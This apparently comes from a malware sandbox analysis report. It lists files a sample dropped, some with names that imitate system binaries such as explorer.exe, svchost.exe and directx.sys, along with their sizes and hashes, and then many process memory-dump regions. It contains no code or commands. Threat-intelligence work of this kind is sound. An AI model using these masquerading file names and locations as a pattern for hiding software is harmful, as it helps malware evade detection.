8deb0faf08d52f384d5d0d9357189386383f398f8cb282c4419738221201812ace00f40ef9032c5ebf7dab9da76bb5c1517e177963506842ef389b9cd391b6ac

Download Submit
C:\Users\Admin\AppData\Roaming\explorer.exe

Filesize
85KB

MD5
93ebaaade696ce603cb3dfe54ad22cda

SHA1
310c4b6325188fb2207035dc3a884a32b705ab51

SHA256
79d8747723e014945bee42bfb03e8e03e93ee2a7a25056b7e81bd61f94bc4e2c

SHA512
e77a363fd5600936cf5a375e68cd243853f67fe3fd3dc52a5a0a4248d38c9afd1c7b9b46e7a47ba9108376b0f398a39d26cf41c9716ec5fb48d00e4d6d1d7382

Download Submit
C:\Users\Admin\AppData\Roaming\porsche inboxer.exe

Filesize
168KB

MD5
ace08d279f65f6ead0421577476928b6

SHA1
d828d8dfbb543eb1db8b0e3f4430b90e50a23fbd

SHA256
bc93e49457acf3990c916a84d51916638332bf1e7d775e6ad9f240ea595a41b5

SHA512
9910dd98b435f51dca61e78c4721c10a355e288f8b466ef3a4cee71cfcd5dbd5c4beef5d0acfba11e67943a341060f0ecf0f44e793ea1df47e23f149be7cf8d1

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
72KB

MD5
c8fa0a769f8f46b26682531e8a8e47dc

SHA1
c469c639d89b2d6df36f16761a5c9844928cb7c1

SHA256
68282cfb49f1c6ae112fa5df279525aa0d0d5fb3d24554c10fee195498885ca6

SHA512
654855d8f3534017ba4ebb2ecb9d01ee46d62f565e299b2c05d9baa7b81be6af016a357367d7abb237a127320868187b2a6eb60b016a434fb80e42b27e4a79ea

Download Submit
C:\Windows\directx.sys

Filesize
237B

MD5
8064edaa77a05f56974931ca4a8db1d8

SHA1
691cc8efe25978ce36bd63921ae877f91a83a92a

SHA256
61514a9719ebf49342c6a7990277b594ee1a93c03697ac223a2fc6ce11d0c8eb

SHA512
58bdde988647c5d6d1fdf1f100f8a4fe767eb2fd0acd9e20ad70813a2cb681e371204dbc12e3499761357316874b1b920f71fc12ace8ff677242ee10dbbe397d

Download Submit
C:\Windows\directx.sys

Filesize
212B

MD5
dfe543c85ab6f281de3f14715fd94457

SHA1
3ccf66c4a139e976fc1ec4bad6c09d214f237663

SHA256
1033fa0baef3b646ca13be7d181af142d3071133e37aec979f108074c426f968

SHA512
ea7e8ae4dbc82cd5873d09da2e7c54174045db57c28348e77935fe24e498e88a6b9803e806ec3c49dc63a7d4b02ddbf1b375c172cf4f344a6533b436f491b232

Download Submit
C:\Windows\directx.sys

Filesize
260B

MD5
72773a04bc63ad721bf795753a8b9170

SHA1
189f11ddff98586254b90cb2c0a2f57a876ca302

SHA256
25988cfa2501466a5b3b1de732fd181dda0ec633edc1c309cea857e916095f12

SHA512
8f960a07ead725b63c563a1b075d7a695696f8df15dce5c29859a54bc4b45af3d5ae5fff1dbaa39dd9598684563a0fe8c38c08435386e229182195090ea1b83a

Download Submit
C:\Windows\directx.sys

Filesize
225B

MD5
54bd5e0eeff9b29b5641c47062d289b9

SHA1
f037ba63893d13a1a401877e16722d0dba0f06e7

SHA256
8f351fedebe93f7d79d8b0cef2b6ac0cdb462a305ebca82f4c45124a2327ffd2

SHA512
d364e075028b7c550d572a46df5e9211d8925a00a7016391bf3401a4f7d549be91c2680fb147f2bae40b5108f630db32501c0a32bf6f362d364d3c0ac509fccc

Download Submit
C:\Windows\directx.sys

Filesize
133B

MD5
9d0b0a73045e37019ddbff8257b1fdaa

SHA1
251363a1c59652cfa2f8af0245a5cda57651882b

SHA256
b36f5c73f68a1079e0faf1e762ae63b620653410b3479bc46ec2e1209bb7c343

SHA512
5af739520cb92326a6189c399e5b02108e11d2cf58db4105c3ef49bbade8dc01bcfa7f3de4aafa76ecca7b8b730c4b41efa1d2664b61a84e398c4f7fddb60f11

Download Submit
C:\Windows\directx.sys

Filesize
178B

MD5
568640a8b58a8ec996f2b5676a2519db

SHA1
d11dde11666dd6f24877ac032f2cb717fa836379

SHA256
a34bc4b9e33b91e49604c2447933a691fa47b62bc8a7c8c1d17739cfbf07cf04

SHA512
5e9a173660b82702f4b458c57b432fc3668db15e208647a14a9ec9ded56a27226d3c84a6467926ceead2f3aafc9e51609153c1013e00b1de5f1eea15fcdc09c9

Download Submit
C:\Windows\svchost.com

Filesize
40KB

MD5
a88b2c5285cf3376b7657c641d5680bd

SHA1
8844222901c7c94b319d37335abfd3d3c500f98c

SHA256
5d46186ed0d3c98c37d76a9c4112220e1cf7492ff487c286e320ddc8d6abb898

SHA512
1981265e4264a13e020d3ec4b6ba356fca7907e3f92f3c33d62e80d1a456609aea755a3d810bd861840a51942ebb26b84f061ea6a8663253e06f7532d11610b5

Download Submit
memory/224-276-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/504-249-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/716-561-0x000000006FC20000-0x000000006FC6C000-memory.dmp

Filesize
304KB

Download
memory/968-242-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1128-458-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1128-720-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1128-703-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1128-592-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1204-581-0x000000006FC20000-0x000000006FC6C000-memory.dmp

Filesize
304KB

Download
memory/1312-527-0x000000006FC20000-0x000000006FC6C000-memory.dmp

Filesize
304KB

Download
memory/1440-506-0x000000006FC20000-0x000000006FC6C000-memory.dmp

Filesize
304KB

Download
memory/1480-86-0x0000000000D50000-0x0000000000D6C000-memory.dmp

Filesize
112KB

Download
memory/1612-313-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1676-304-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1848-13-0x0000000000250000-0x0000000000334000-memory.dmp

Filesize
912KB

Download
memory/1848-12-0x00007FFE7A263000-0x00007FFE7A265000-memory.dmp

Filesize
8KB

Download
memory/2164-284-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2368-88-0x0000000000900000-0x000000000091A000-memory.dmp

Filesize
104KB

Download
memory/2404-601-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2404-364-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2508-290-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2620-90-0x0000024642280000-0x00000246422AE000-memory.dmp

Filesize
184KB

Download
memory/2932-241-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3396-480-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3396-594-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3396-719-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3396-704-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3572-507-0x00000000074F0000-0x0000000007501000-memory.dmp

Filesize
68KB

Download
memory/3572-421-0x0000000006540000-0x000000000658C000-memory.dmp

Filesize
304KB

Download
memory/3572-464-0x000000006FC20000-0x000000006FC6C000-memory.dmp

Filesize
304KB

Download
memory/3572-463-0x0000000007180000-0x00000000071B2000-memory.dmp

Filesize
200KB

Download
memory/3572-475-0x00000000071C0000-0x0000000007263000-memory.dmp

Filesize
652KB

Download
memory/3572-474-0x0000000006510000-0x000000000652E000-memory.dmp

Filesize
120KB

Download
memory/3572-476-0x0000000007910000-0x0000000007F8A000-memory.dmp

Filesize
6.5MB

Download
memory/3572-478-0x0000000004D40000-0x0000000004D5A000-memory.dmp

Filesize
104KB

Download
memory/3572-550-0x0000000007610000-0x0000000007618000-memory.dmp

Filesize
32KB

Download
memory/3572-549-0x0000000007630000-0x000000000764A000-memory.dmp

Filesize
104KB

Download
memory/3572-488-0x0000000007350000-0x000000000735A000-memory.dmp

Filesize
40KB

Download
memory/3572-548-0x0000000007530000-0x0000000007544000-memory.dmp

Filesize
80KB

Download
memory/3572-489-0x0000000007570000-0x0000000007606000-memory.dmp

Filesize
600KB

Download
memory/3572-547-0x0000000007520000-0x000000000752E000-memory.dmp

Filesize
56KB

Download
memory/3572-420-0x0000000005FC0000-0x0000000005FDE000-memory.dmp

Filesize
120KB

Download
memory/3668-551-0x000000006FC20000-0x000000006FC6C000-memory.dmp

Filesize
304KB

Download
memory/3748-298-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/4308-356-0x0000000005E70000-0x0000000005E92000-memory.dmp

Filesize
136KB

Download
memory/4308-537-0x000000006FC20000-0x000000006FC6C000-memory.dmp

Filesize
304KB

Download
memory/4308-314-0x00000000057D0000-0x0000000005DF8000-memory.dmp

Filesize
6.2MB

Download
memory/4308-367-0x00000000061B0000-0x0000000006504000-memory.dmp

Filesize
3.3MB

Download
memory/4308-358-0x0000000005F80000-0x0000000005FE6000-memory.dmp

Filesize
408KB

Download
memory/4308-305-0x00000000030C0000-0x00000000030F6000-memory.dmp

Filesize
216KB

Download
memory/4308-357-0x0000000005F10000-0x0000000005F76000-memory.dmp

Filesize
408KB

Download
memory/4388-282-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/4440-205-0x000002ADB46A0000-0x000002ADB46C2000-memory.dmp

Filesize
136KB

Download
memory/4440-283-0x000002ADB46F0000-0x000002ADB46F8000-memory.dmp

Filesize
32KB

Download
memory/4440-459-0x000002ADB4930000-0x000002ADB497C000-memory.dmp

Filesize
304KB

Download
memory/4440-462-0x000002ADB4980000-0x000002ADB499A000-memory.dmp

Filesize
104KB

Download
memory/4832-258-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/4856-270-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/4968-571-0x000000006FC20000-0x000000006FC6C000-memory.dmp

Filesize
304KB

Download
memory/4972-239-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/5008-269-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/5084-517-0x000000006FC20000-0x000000006FC6C000-memory.dmp

Filesize
304KB

Download
memory/5088-495-0x000000006FC20000-0x000000006FC6C000-memory.dmp

Filesize
304KB

Download
memory/5096-637-0x000000001F300000-0x000000001F420000-memory.dmp

Filesize
1.1MB

Download
memory/5096-638-0x000000001D560000-0x000000001D56E000-memory.dmp

Filesize
56KB

Download
memory/5096-618-0x000000001E990000-0x000000001E99E000-memory.dmp

Filesize
56KB

Download
memory/5096-78-0x0000000000AE0000-0x0000000000AF8000-memory.dmp

Filesize
96KB

Download
memory/5096-716-0x000000001F420000-0x000000001F770000-memory.dmp

Filesize
3.3MB

Download
memory/5144-688-0x000000006FC20000-0x000000006FC6C000-memory.dmp

Filesize
304KB

Download
memory/5196-607-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/5424-678-0x000000006FC20000-0x000000006FC6C000-memory.dmp

Filesize
304KB

Download
memory/5448-595-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/5496-505-0x00000000001B0000-0x00000000001C8000-memory.dmp

Filesize
96KB

Download